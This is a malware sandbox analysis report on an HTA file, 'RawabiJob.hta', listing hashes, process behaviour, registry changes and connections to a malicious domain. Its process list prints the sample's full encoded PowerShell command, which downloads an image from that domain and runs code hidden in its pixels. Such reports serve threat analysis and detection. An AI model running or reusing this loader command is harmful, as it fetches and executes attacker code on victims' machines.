analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

RawabiJob.hta

Full analysis: https://app.any.run/tasks/78e8f7db-0702-46e3-93a6-47781bf5c64a
Verdict: Malicious activity
Analysis date: March 14, 2019, 16:10:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5:

1ADE34CA64F586385E67FE995834D815

SHA1:

5DB84D17DF0DC7F572EA64A09087C36409C5ACA4

SHA256:

F1F0341BFE3B803CA654F43290410584C03C80C22C1AE1E7E87EF1D7F5B7E6ED

SSDEEP:

48:i177p6olSJuowcqfjIqxwJQOPHvH7t4sX16vTPjS3a:G77tkJuowcqfjIqxwJQGH7t4y6vHSK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3404)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1428)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 2968)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 2968)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start mshta.exe cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2968"C:\Windows\System32\mshta.exe" "C:\Users\admin\Desktop\RawabiJob.hta"C:\Windows\System32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3404"C:\Windows\System32\cmd.exe" /c powershell.exe /w 1 -ExecutionPolicy Bypass -enc cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AEEAZABkAC0AVAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiADsAJABnAD0AIABhACAAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4AQgBpAHQAbQBhAHAAKAAoAGEAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBPAHAAZQBuAFIAZQBhAGQAKAAiAGgAdAB0AHAAOgAvAC8AbABvAGMAYQBsAC0AdQBwAGQAYQB0AGUALgBjAG8AbQAvAGIAYQBuAGEAbgBhAC4AcABuAGcAIgApACkAOwAkAG8APQAgAGEAIABCAHkAdABlAFsAXQAgADUAMQAwADAAOwAoADAALgAuADEANgApAHwAJQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAeAAgAGkAbgAgACgAMAAuAC4AMgA5ADkAKQApAHsAJABwAD0AJABnAC4ARwBlAHQAUABpAHgAZQBsACgAJAB4ACwAJABfACkAOwAkAG8AWwAkAF8AKgAzADAAMAArACQAeABdAD0AKABbAG0AYQB0AGgAXQA6ADoARgBsAG8AbwByACgAKAAkAHAALgBCACAALQBiAGEAbgBkACAAMQA1ACkAKgAxADYAKQAgAC0AYgBvAHIAIAAoACQAcAAuAEcAIAAtAGIAYQBuAGQAIAAxADUAKQApAH0AfQA7AEkARQBYACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAG8AWwAwAC4ALgA0ADkAMgA3AF0AKQApAA==C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1428powershell.exe /w 1 -ExecutionPolicy Bypass -enc cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AEEAZABkAC0AVAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiADsAJABnAD0AIABhACAAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4AQgBpAHQAbQBhAHAAKAAoAGEAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBPAHAAZQBuAFIAZQBhAGQAKAAiAGgAdAB0AHAAOgAvAC8AbABvAGMAYQBsAC0AdQBwAGQAYQB0AGUALgBjAG8AbQAvAGIAYQBuAGEAbgBhAC4AcABuAGcAIgApACkAOwAkAG8APQAgAGEAIABCAHkAdABlAFsAXQAgADUAMQAwADAAOwAoADAALgAuADEANgApAHwAJQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAeAAgAGkAbgAgACgAMAAuAC4AMgA5ADkAKQApAHsAJABwAD0AJABnAC4ARwBlAHQAUABpAHgAZQBsACgAJAB4ACwAJABfACkAOwAkAG8AWwAkAF8AKgAzADAAMAArACQAeABdAD0AKABbAG0AYQB0AGgAXQA6ADoARgBsAG8AbwByACgAKAAkAHAALgBCACAALQBiAGEAbgBkACAAMQA1ACkAKgAxADYAKQAgAC0AYgBvAHIAIAAoACQAcAAuAEcAIAAtAGIAYQBuAGQAIAAxADUAKQApAH0AfQA7AEkARQBYACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAG8AWwAwAC4ALgA0ADkAMgA3AF0AKQApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
354
Read events
281
Write events
73
Delete events
0

Modification events

(PID) Process:(2968) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2968) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2968) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(2968) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(1428) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(1428) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1428) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1428) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(1428) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(1428) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
1428powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2U3QGFY9PZXPTF7L6Q3Y.temp
MD5:
SHA256:
1428powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1ae214.TMPbinary
MD5:0586DB8FF5249AD980CEC7BF2CBC3708
SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2
1428powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0586DB8FF5249AD980CEC7BF2CBC3708
SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1428
powershell.exe
GET
404
88.119.179.218:80
http://local-update.com/banana.png
LT
xml
345 b
malicious
2968
mshta.exe
GET
404
88.119.179.218:80
http://local-update.com/rawabi/index.html
LT
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2968
mshta.exe
88.119.179.218:80
local-update.com
Neustar, Inc
LT
malicious
1428
powershell.exe
88.119.179.218:80
local-update.com
Neustar, Inc
LT
malicious

DNS requests

Domain
IP
Reputation
local-update.com
  • 88.119.179.218
malicious

Threats

No threats detected
No debug info